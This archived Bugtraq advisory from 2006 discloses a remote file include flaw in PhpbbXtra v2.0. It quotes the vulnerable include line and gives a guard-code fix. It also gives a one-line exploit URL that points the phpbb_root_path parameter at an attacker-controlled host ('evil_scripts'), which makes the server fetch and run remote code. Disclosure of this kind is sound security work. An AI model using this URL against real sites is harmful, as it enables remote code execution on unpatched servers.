bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

from [xorontr] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability
From: xorontr@gmail.com
Date: 25 Dec 2006 16:57:56 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
-----------------------------------------------

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

-----------------------------------------------

Author: xoron

-----------------------------------------------
 
Vuln Code: include($phpbb_root_path . 'includes/bbcode.'.$phpEx);

-----------------------------------------------

F!X:

-open /includes/archive/archive_topic.php this file

-write this code before vuln. code


if ( !defined('IN_PHPBB') )
{
    die('Hacking attempt');
}


- save and exit

-----------------------------------------------

exploit:

http://www.[target].com/[script_path]/includes/archive/archive_topic.php?phpbb_root_path=http://evil_scripts
 ?

-----------------------------------------------

download:http://sourceforge.net/project/showfiles.php?group_id=152219

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlar.n kurban bayram. simdiden mubarek olsun -
-                                                         -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-25]
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability, xorontr <=
Previous by Date:  phpcms <=- 1.1.7 Remote File Inclusion, Zarloule04
Next by Date:  HLStats Remote SQL Injection Exploit, nospam
Previous by Thread:  phpcms <=- 1.1.7 Remote File Inclusion, Zarloule04
Next by Thread:  HLStats Remote SQL Injection Exploit, nospam
Indexes:  [Date] [Thread] [Top] [All Lists]